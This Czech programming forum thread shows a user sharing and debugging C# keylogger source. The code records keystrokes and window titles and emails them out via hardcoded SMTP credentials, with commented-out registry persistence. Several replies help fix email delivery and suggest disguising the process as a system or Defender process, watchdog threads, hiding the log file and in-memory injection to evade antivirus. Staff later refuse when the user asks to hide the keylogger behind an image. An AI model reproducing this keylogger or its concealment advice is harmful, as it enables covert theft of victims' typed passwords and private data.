Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Zdravim všechny.
Mám dotaz ohledně Keyloggeru vim že už takové vlákno tady je ale je už poněkud cca 3roky staré a neni to přesně to co chci já.Mám hotový keylogger který je neviditelný akorát v procesech jde vidět tušim dál umí odchytávat klávesy a zapisovat do textáku ale má jednu chybku který tak trochu nerozumim spustim keylogger začnu psát například do vyhledávače a po uběhnutí intervalu pro uložení textu mi vyskočí errorová tabulka a nejde dál pokračovat a ještě to nepošle na email :/ a jako hlavní nemá žádný butony,labely,richtex­tboxy má jen jeden základní form,textbox a jeden timer snažil sem se do udělat co nejjednodužší ale zároven aby fungoval jak má a plnil moje očekávání.Kdo by měl zájem mi pomoci tak stačí odepsat sem do diskuze a pošlu sem kompletně celý kod! :) Děkuju předem všem co se mi pokusí pomoc a třeba i vylepšit o pár zajímavých funkcí sem lehce pokročilí tak se rád naučim nový věci vlastně kvůli tomu tu jsem jsou tu zajímavý projekty :) ještě jednou Děkuju.
PS:Pepík ;) :D

 
Odpovědět  -2 6. září 2:19
Avatar
Petr Stastny
Redaktor
Avatar
 
Nahoru Odpovědět  +2 6. září 7:02
Avatar
Odpovídá na AnonymPepča
Michal Štěpánek:

Rozepsal jsi se docela obšírně o svém přání, ale to hlavní jsi nenapsal

...mi vyskočí errorová tabulka...

Jaká je to chyba? Možná, že když si tu chybu pořádně přečteš, třeba na to nakonec přijdeš i sám, ale dokud nám neřekneš, co je to za chybu, těžko ti pomoci...

Nahoru Odpovědět  +2 6. září 7:49
Nikdy neříkej nahlas, že to nejde. Vždycky se totiž najde blbec, který to neví a udělá to...
Avatar
Marian Benčat
Redaktor
Avatar
 
Nahoru Odpovědět 6. září 9:38
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Vyskočí přesně tato chyba:
Microsoft.NET Framework
V součásti aplikace došlo k neošetřené výjímce
Pokud kliknete na tlačítko pokračovat,
aplikace bude tuto chybu ignorovat a pokusí se pokračovat.
Pokud kliknete na tlačítko konec aplikace bude ukončena.

Server SMTP vyžaduje zabezpečené připojení nebo.

Když dám pokračovat tak tabulka nikam nemizí a pořád nejde pošlu i celej kod jak je napsanej :) jinak děkuju za ochotu nečekal sem tak rychlí odezvy ;)

 
Nahoru Odpovědět  -1 6. září 11:03
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

using System;
using System.Collec­tions.Generic;
using System.Componen­tModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Runtime­.InteropServi­ces;
using System.Window­s.Forms;
using System.IO;
using Microsoft.Win32;

namespace KeyLogger3._0
{
public partial class Form1 : Form
{

public Form1()
{
InitializeCom­ponent();
timer1.Start();
// System.IO.File­.SetAttributes(Ap­plication.Exe­cutablePath, System.IO.File­Attributes.Hid­den);
/* RegistryKey reg = Registry.Local­Machine.OpenSub­Key("Software\\Mi­crosoft\\Window­s\\CurrentVer­sion\\Run", true);
reg.SetValue("Sys55", Application.E­xecutablePath);
reg.Close();*/
}

string text = "";
string activeWindowOld = "";
private void timer1_Tick(object sender, EventArgs e)
{
string activeWindow = ActiveWindow.Get­Title();

if (activeWindow != activeWindowOld)
if(activeWindow!="")
text += "\n" + activeWindow +": ";

text += KeyControl.Get­BuffKeys();
activeWindowOld = activeWindow;

if (text.Length > 700)
{
WriteTotxt(text);
text = KeyControl.Re­placeChars(tex­t);
Email.Send(text);
text = "";
}
}

private void WriteTotxt(string value)
{
StreamWriter str = new StreamWriter("tes­t.txt", true);
str.Write(value);
str.Close();
}
}
}

Kod z form1 :)

 
Nahoru Odpovědět  -1 6. září 11:05
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

using System;
using System.Collec­tions.Generic;
using System.Linq;
using System.Text;
using System.Net;
using System.Net.Mail;

namespace KeyLogger3._0
{
public static class Email
{
public static void Send(string value)
{
string email = "jmeno@gmail.com";
string pass = "heslo";
NetworkCredential loginInfo = new NetworkCreden­tial(email, pass);
MailMessage msg = new MailMessage();
SmtpClient smtpClient = new SmtpClient("smtp­.gmail.com", 587);

msg.From = new MailAddress(email);
msg.To.Add(new MailAddress("jme­no@gmail.com"));
msg.Body = value;

smtpClient.Ena­bleSsl = true;
smtpClient.Use­DefaultCreden­tials = false;
smtpClient.Cre­dentials = loginInfo;
smtpClient.Sen­d(msg);

}
}
}

Kod pro odesílání na email které nefunguje :)

 
Nahoru Odpovědět  -1 6. září 11:06
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

using System.Linq;
using System.Text;
using System.Runtime­.InteropServi­ces;

namespace KeyLogger3._0
{
public static class ActiveWindow
{

[DllImport("u­ser32.dll")]
static extern IntPtr GetForegroundWin­dow();

[DllImport("u­ser32.dll")]
static extern int GetWindowText(In­tPtr hWnd, StringBuilder text, int count);

public static string GetTitle()
{
const int nChars = 256;
IntPtr handle = IntPtr.Zero;
StringBuilder title = new StringBuilder(nChar­s);
handle = GetForegroundWin­dow();

if (GetWindowTex­t(handle, title, nChars) > 0)
return title.ToString() ;
return "";

}
}
}

A poslední důležý kod z ActiveWindows :)

Akceptované řešení
+5 Zkušeností
Řešení problému
 
Nahoru Odpovědět  -2 6. září 11:07
Avatar
Marian Benčat
Redaktor
Avatar
Marian Benčat:

Ach..

  1. Koukej to upravit prosím a dát ten kód do CODE sekce
takto
  1. Napsalo ti to naprosto přesně, co to chce a sice, že vyžaduje zabezpečené spojení. Googlovské SSL SMTP má tuším port 465. 587cka je STARTTLS, které slouží k switchi z non-ssl/TLS na ssl/TLS a to si nesjsem jistý,že tern SMTP client umí a takto to vůbec jde..
Editováno 6. září 13:15
 
Nahoru Odpovědět 6. září 13:13
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Ano funguje tak a jen sem musel změnit port který neni zabezpečený :) vim že před cca 3mi lety 465,587 fungoval bez problému ale dnes tomu tak není a funguje port.25 :) a ještě jedna maličkost jak změnim ve vlastnostech souboru.exe jeho název mám tam keylogger ale chci aby tam bylo například test.exe :) předem děkuji všem za rady :)

 
Nahoru Odpovědět 6. září 13:41
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Měl bych jeste jednu prosbu jak mám udělat aby to nebylo vidět v procesech? :)

 
Nahoru Odpovědět 6. září 15:49
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Jmeno: v pruzkumniku windows na ten exac klikni a F2. Nebo jestli to vazne potrebujes, dej ve VS prejmenovat projekt (klikni v solution exploreru na jmeno projektu pravym a prejmenovat - ale nwm, jestli to pomuze)

Procesy: To nepujde, ale muzes ten proces prejmenovat, aby vypadal oficialne, treba Microsoft Defender Background Worker (nebo tak neco) a dat tomu odpovidajici ikonku.

A taky nedavej za splnenou odpoved tu svoji. Tak mas oznacit nekoho, kdo ti pomohl, ne sebe.

// EDIT: Dej pozor, at proces s tim jmenem uz neexistuje

Editováno 6. září 16:22
 
Nahoru Odpovědět 6. září 16:19
Avatar
AnonymPepča
Člen
Avatar
Odpovídá na Petr Stastny
AnonymPepča:

Mohla by být názorná ukázka?zkoušel sem to ale nák se mi nedaří :D jak jsem psal víš sem lehce pokročilej :)

 
Nahoru Odpovědět 6. září 16:46
Avatar
Odpovídá na AnonymPepča
Josef Kuchař (Pepa489):

No, jsou ty mnohem lepší techniky popisované v knize "HACKING: pracktický průvodce penetračním testováním", kde autor ukazuje, jak můžeš injectovat powershell do RAM a vyhnout se tak detekci AV a poté dejme tomu odesílat http požadavky na tvůj server. Případně migrovat do jiného procesu(například explorer.exe) a zůstat persistentní pomocí registrů ;)

Nahoru Odpovědět  +1 6. září 16:53
2x piš, jednou debuguj
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Názorná ukázka čeho? Přejmenování aplikace? Přejmenování procesu? Předělání ikonky? :-)

 
Nahoru Odpovědět 6. září 17:04
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:
Thread.CurrentThread.Name = "Jméno tvého vlákna";

// Sprostě ukradeno ze zdejšího seriálu o vícevláknovém programování
 
Nahoru Odpovědět 6. září 17:06
Avatar
Nahoru Odpovědět  +1 6. září 17:17
2x piš, jednou debuguj
Avatar
Martin Dráb
Redaktor
Avatar
Odpovídá na AnonymPepča
Martin Dráb:

Skrýt svůj proces ze seznamu procesů možné je. Záleží na tom, jak moc odolné to musí být – tzn. jak moc dá práce ten skrytý proces odhalit. Míra odolnosti se přitom dost koreluje s obtížností implementace.

Můžeš do správců procesů (jako je Správce úloh) injektovat vlastní kód, který zajistí, že tvůj proces nebude vidět (když se Správce zeptá na seznam procesů, prostě mu trochu přefiltruješ výsledky a ten svůj z nich odstraníš). Na 32bitových verzích Windows se dalo skrývat přímo úpravou seznamu běžících procesů v jádře (je to obousměrný spoják s hlavou), což ale obvykle vyžadovalo si na to napsat ovladač. Na 64bitových Windows to už nejde vzhledem k zabudované ochraně jádra.

Možnost existovat jako kus kódu či DLL knihovna pouze v některém cizím procesu také funguje, ale ta implementace nemusí být zrovna jednoduchá, pokud chceš být slušně neviditelný. Navíc, pokud má uživatel nainstalovaný nějaký slušnější HIPS, tak ten běžné pokusy o injekci zachytí a zahlásí.

Také by bylo lepší neinjektovat .NET DLL, ale spíše něco napsaného v kompilovaném jazyce, abys tolik neovlivňoval proces, do kterého injektuješ.

Zkráceně řečeno: možnosti jsou, ale dá to dost práce a asi to moc, vyjma cvičení sebe sama, nevyužiješ (legitimní použití se moc nenajdou).

Nahoru Odpovědět 6. září 17:43
2 + 2 = 5 for extremely large values of 2
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Skyrýt textový soubor přesně aby se mi nevytvářel u keyloggeru :) a ano i přejmenovat kolonku v procesech aby to tam nebylo jako keylogger+přej­menovat samostatný exe soubor ve vlastnostech je taky napsáno keylogger :) a odolnost?co nejlepší a co nejjednodušim kodem :)

 
Nahoru Odpovědět 6. září 17:46
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Tak postupně abych to správně pochopil i napsal :) za 1. jak skryju textový soubor aby se nevytvářel i samotného programu?názorná ukázka kodu by pomohla :)

 
Nahoru Odpovědět 6. září 17:51
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Používej tlačítko odpovědět. To říkáš komu? Mě?

Textový soubor buď můžes nastavit jako skrytý (i když hodně lidí si skryté soubory zobrazuje), nebo ho uložit někam do pryč. Nebo obojí.

A když přejmenuješ soubor, tak ve vlastnostech se ti taky změní, ne???

Přejmenování procesů jsem ti psal. A jestli to chceš odolný, prostě udělej druhý vlákno, který hlídá první (spustí ho, když se ukončí) a to první hlídá druhý.

 
Nahoru Odpovědět 6. září 17:55
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Napiš srozumitelně, jaký ukázky kódu potřebuješ. Určitě něco na stackoverflow nebo podobných vyhrabem.

 
Nahoru Odpovědět 6. září 17:56
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

ukázka kodu jak skryju textový soubor :) aby se mi nevytvářel u programu :) jinak pardon ze sem to napsal tak nalískaně na sobě :D

 
Nahoru Odpovědět 6. září 17:57
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Promin :) :D tak měl bys nákou ukázku jak to napsat nebo jak to udělat? :)

Editováno 6. září 17:59
 
Nahoru Odpovědět 6. září 17:58
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Hlavně používej to velký tlačítko odpovědět. Jenom se stane to, že mi přijde upozornění, že mi někdo něco napsal.

Editováno 6. září 17:58
 
Nahoru Odpovědět 6. září 17:58
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Počkej, ten tvůj keylogger funguje tak, že naslouchá klávesám, ukládá to do texťáku a každej třeba den ti to odešle na mail?

// Obsah toho textaku

Editováno 6. září 17:59
 
Nahoru Odpovědět 6. září 17:59
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Ano funguje přesne že odchytává klávesy zapisuje do textáku co daný člověk napíše+odešle po 700znacích email s daty :) ten kod na dané stránce skrývá nebo maže textový soubor?a kam ho zapsat jestli je tomu tak :) jinak mám omezený práva na psaní odpovědí.

 
Nahoru Odpovědět 6. září 18:29
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Skrývá.

Nebylo by lepší se vykašlat na texťák, házet si to do proměnné a odeslat to po 700 znacích rovnou z proměnné?

Všechny kódy máš na tý stránce.

A právo na odpověď bys měl mít.

Jo a ten tvůj keylogger ti rozeznává velká a malá písmena?

 
Nahoru Odpovědět 6. září 19:43
Avatar
AnonymPepča
Člen
Avatar
Odpovídá na Petr Stastny
AnonymPepča:

Psalo mi to že posílám moc komentářu za sebou :D ale to je fuk :) a neroznenává malá velká písmena :) a moc nevim kde co přepsat tak kdyby to šlo ukazat bylo by to lepší :) jinak všem děkuju za trpělivost :D :)

 
Nahoru Odpovědět 6. září 22:12
Avatar
Martin Dráb
Redaktor
Avatar
Odpovídá na AnonymPepča
Martin Dráb:

Skrytí souboru tak, aby se nevytvářel u té aplikace, znamená uložit jej do jiného adresáře. Třeba k dočasným souborům atd. Pro opravdové "skrývání" souborů platí podobná pravidla jako pro skrývání procesů – pokud to chceš dělat slušně (tentokrát lze i na 64bitových systémech), tak potřebuješ ovladač jádra. Ale jak tu někteří píšou, pro 700 znaků stačí ukládat do proměnné (samozřejmě je pak třeba pořešit nějak restarty počítače atd.).

Tak nějak na mě působíš, že moc nerozumíš tomu, co děláš a do jakých vod ses dostal.

Nahoru Odpovědět 6. září 22:30
2 + 2 = 5 for extremely large values of 2
Avatar
AnonymPepča
Člen
Avatar
Odpovídá na Martin Dráb
AnonymPepča:

Rozumim samotnýmu keyloggeru jen odesílání na email sem programoval poprvý :) a skrývání nebo ukládání do jinýho adresáře nikdy :) a internet me dostal az sem :D tak me zajimá jestli mi tu někdo ukáže ukázku kodu co a kam zapsat aby se nevytvářel u aplikace děkuju. :)

 
Nahoru Odpovědět 6. září 23:05
Avatar
Martin Dráb
Redaktor
Avatar
Odpovídá na AnonymPepča
Martin Dráb:

neroznenává malá velká písmena :) a moc nevim kde co přepsat

Pokud bys tomu kódu keyloggeru (kterýžto tu nevidím uvedený) rozuměl, tak s tímhle nemáš problém. Resp. víš, že máš poměrně těžko řešitelný problém (z této vlastnosti tvého keyloggeru usuzuju na implementaci).

Ukládání do jiného adresáře je věc, kteoru bys měl být schopný naprogramovat, když dokážeš naprogramovat ukládání do adresáře tvé aplikace. Prostě při otevření toho textového souboru, kam ukládáš data, specifikuješ jinou cestu, než adresář tvé aplikace (nebo aktuální adresář). Jaký adresář místo toho specifikuješ, je na tvém kvalifikovaném rozhodnutí a znalostech systému.

S nějakým pokročilejším skrýváním ti tady asi nikdo nepomůže, i kdyby měl znalosti (nebo ne veřejně), protože to už začíná hodně zavánět nelegitimním pouužitím (neuvádíš tu nikde důvod, proč se chceš skrývat).

Ono je to pak právě hodně o tom, jak moc pozorný je uživatel. Pokud třeba přejmenuješ svůj program na nějaký ten systémový (csrss.exe atd.), tak si toho na první pohled třeba nikdo nevšimne. Na druhý ale ano (stačí si projít plné názvy souborů běžících procesů). A pak je to jen o tom, jak moc se chceš skrývat.

Nahoru Odpovědět 6. září 23:20
2 + 2 = 5 for extremely large values of 2
Avatar
jackx
Člen
Avatar
Odpovídá na AnonymPepča
jackx:

Kukaj sem. Tam najdes, jak vytvorit soubor jinde. Precti si i dalsi dil serialu: http://www.itnetwork.cz/…e-se-soubory

Nahoru Odpovědět  +1 6. září 23:21
Nic není nemožné.
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Moc děkuji všem už přibližne vim kde co přepsat jednoduše řečeno mám v tom kodu bordel někde sem se stratil ale asi už vim kde :) jinač celý program je jen pro účel testování k ničemu jinému sloužit nemá jen mě zajímá co je člověk schopný vytvořit a jak to funguje v praxi vše testuju na svých PC ne cizích :) baví mě obcházení systému a programování všeobecně :) A určitě se s vámi podělim o kod ;)

Toto je kod pro snímání kláves který uživatel stiskne a ukládá do textového souboru Form1 :)
using System;
using System.Collec­tions.Generic;
using System.Componen­tModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Runtime­.InteropServi­ces;
using System.Window­s.Forms;
using System.IO;
using Microsoft.Win32;

namespace KeyLogger3._0
{
public partial class Form1 : Form
{

public Form1()
{
InitializeCom­ponent();
timer1.Start();
// System.IO.File­.SetAttributes(Ap­plication.Exe­cutablePath, System.IO.File­Attributes.Hid­den);
/* RegistryKey reg = Registry.Local­Machine.OpenSub­Key("Software\\Mi­crosoft\\Window­s\\CurrentVer­sion\\Run", true);
reg.SetValue("Sys55", Application.E­xecutablePath);
reg.Close();*/
}

string text = "";
string activeWindowOld = "";
private void timer1_Tick(object sender, EventArgs e)
{
string activeWindow = ActiveWindow.Get­Title();

if (activeWindow != activeWindowOld)
if(activeWindow!="")
text += "\n" + activeWindow +": ";

text += KeyControl.Get­BuffKeys();
activeWindowOld = activeWindow;

if (text.Length > 700)
{
WriteTotxt(text);
text = KeyControl.Re­placeChars(tex­t);
Email.Send(text);
text = "";
}
}

private void WriteTotxt(string value)
{
StreamWriter str = new StreamWriter("tes­t.txt", true);
str.Write(value);
str.Close();
}
}
}

A toto je kod pro odesílání na email :) volil sem co nejjednodužší cestu psání kodu ale aby to bylo co nejlepší a už vim co přepsat cca všem moc děkuju a až to dodělám tak se s vámi určitě podělim o kompletní program+kody a co kde sem opravil,přepsal :)
using System;
using System.Collec­tions.Generic;
using System.Linq;
using System.Text;
using System.Net;
using System.Net.Mail;

namespace KeyLogger3._0
{
public static class Email
{
public static void Send(string value)
{
string email = "Nickname@ema­il.cz";
string pass = "pass";
NetworkCredential loginInfo = new NetworkCreden­tial(email, pass);
MailMessage msg = new MailMessage();
SmtpClient smtpClient = new SmtpClient("smtp­.seznam.cz", 25);

msg.From = new MailAddress(email);
msg.To.Add(new MailAddress("Nic­kname@email.cz"));
msg.Body = value;

smtpClient.Ena­bleSsl = true;
smtpClient.Use­DefaultCreden­tials = false;
smtpClient.Cre­dentials = loginInfo;
smtpClient.Sen­d(msg);

}
}
}

 
Nahoru Odpovědět  +1 8. září 5:58
Avatar
Petr Stastny
Redaktor
Avatar
Odpovídá na AnonymPepča
Petr Stastny:

Pouzivej tag code - kod vkladej do ty ikonky </>

 
Nahoru Odpovědět 8. září 7:14
Avatar
Odpovídá na Josef Kuchař (Pepa489)
Ondřej Langr (andysekcze):

Hoj, je to i jako ebook? Nechce se mi to kupovat ve vyloženě knižní podobě :)

Nahoru Odpovědět  -1 8. září 22:10
I have a charger. I have Note 7. Umh I haven't Note7.
Avatar
Odpovídá na Ondřej Langr (andysekcze)
Josef Kuchař (Pepa489):

V anglické verzi určitě, v české nejspíš ne

Nahoru Odpovědět 8. září 23:11
2x piš, jednou debuguj
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Ahoj všichni tak texták sem vyřešil v proměných jak mi bylo napsáno víš v diskuzi vyzkoušel sem si i ukládání do jiné knihovny.Ale ted bych měl zájem ještě udělat to že keylogger skryju například za obrázek,odkaz :) zjednodušeně mám na mysli přesně to že rozkliknu fotku ta se klasicky zobrazí a chci aby se s fotkou spustil i keylogger.A to i když fotku vykřížkuju aby pořád běžel dokud ho nevypnu v procesech. :3 uměl by tu někdo poradit jak to provést? :o předem všem děkuju za rady :) a hlavně za trpělivost :D ;)

 
Nahoru Odpovědět  -2 9. září 2:26
Avatar
Marian Benčat
Redaktor
Avatar
Odpovídá na AnonymPepča
Marian Benčat:

bijou te ve skole hodne, ze dokaze uz takto z jednoducheho textu vyjadrit svuj kretenismus? ;-)

 
Nahoru Odpovědět  ±0 9. září 4:48
Avatar
Adam Ježek
Tým ITnetwork
Avatar
Odpovídá na AnonymPepča
Adam Ježek:

Nečekej, že tu začátečníkovi, který se očividně pokouší o něco, čemu nerozumí, budeme radit, jak se pouštět do nezakoných věcí.

Nahoru Odpovědět  +4 9. září 7:05
Pokud chceš odpovědět, klikni na odpovědět. Pokud chceš vložit zdroják, klikni na vložit zdroják (</>)
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Mariane za 1.Nechodim už dávno do školy takže se zdrž těhle koměntářů protože ted ses zachoval jako ubohé děcko :) a jestli si dospělý o to hůř.
Za 2. Adame když už si tu tykáte program nemá nikoho poškodit na osobních informacích je to jen test :)
jen sem se chtěl naučit něco novýho a kdybych tomu nerozuměl tak nenapíšu ani řádku kodu natož udělat to aby se textový soubor nezobrazoval ;) stačilo odepsat slušně ne se hned navážet!A ještě k tobě Mariane z tvého komentáře je vidět že naprosto neumíš nic protože inteligentní člověk nenapíše takovýto komentář jako od 15ti letého děcka.
děkuju všem co mi poradili mějte se Ahoj :)

 
Nahoru Odpovědět 9. září 11:21
Avatar
Martin Dráb
Redaktor
Avatar
Odpovídá na AnonymPepča
Martin Dráb:

Adame když už si tu tykáte program nemá nikoho poškodit na osobních informacích je to jen test :)

To tvrdíš ty. My si to nemáme moc jak ověřit. Souhlasím s tím, že pokud se člověk chce např. věnovat malware, měl by se zabývat tím, jaké používá techniky a klidně si i nějaké vyzkoušet naprogramovat, aby věděl, s čím se může setkat atd. Ale ty už bys rád dělal věci, která minimálně já považuji za velmi pokročilé. To, co bys chtěl udělat s tím obrázkem, je teoreticky možné provést a opět záleží na tom, po jaké úrovni dokonalosti prahneš – přičemž ta nejvyšší znamená, že zneužiješ chybu v prohlížeči obrázků (kterou si ale budeš muset nějak najít).

Mariane z tvého komentáře je vidět že naprosto neumíš nic

Jeho příspěvek, mezi řádky, říká, že byses měl pokusit používat alespoň trochu interpunkce, protože se ten text po tobě špatně čte (pokud samozřejmě je to v tvých silách, což chápu, že být nemusí). Alespoň ale vyslyš ty, kteří ti radí, abys kód dával do tagu [c o d e] (bez mezer), protože jinak se hrozně špatně čte.

Nahoru Odpovědět 9. září 13:22
2 + 2 = 5 for extremely large values of 2
Avatar
Ondřej Langr (andysekcze):

ostrozan proč jsi mi dal mínus? :)

Nahoru Odpovědět  +1 9. září 19:03
I have a charger. I have Note 7. Umh I haven't Note7.
Avatar
ostrozan
Redaktor
Avatar
Odpovídá na Ondřej Langr (andysekcze)
ostrozan:

Omlouvám se - vůbec nevím jak k tomu došlo.
To jsou holt ty mobily :)
Asi by nebylo na škodu vyžádat si potvrzení,že to člověk myslí vážně - nejsem ani první, ani poslední komu se to stalo

 
Nahoru Odpovědět  +1 9. září 19:17
Avatar
AnonymPepča
Člen
Avatar
AnonymPepča:

Došel sem k obrázku sám.Jak říká jedno přísloví co si sám neuděláš nemáš ;) ale děkuju všem co mi nákým způsobem pomohly toho si cením :)

 
Nahoru Odpovědět 23. září 23:44
Děláme co je v našich silách, aby byly zdejší diskuze co nejkvalitnější. Proto do nich také mohou přispívat pouze registrovaní členové. Pro zapojení do diskuze se přihlas. Pokud ještě nemáš účet, zaregistruj se, je to zdarma.

Zobrazeno 46 zpráv z 46.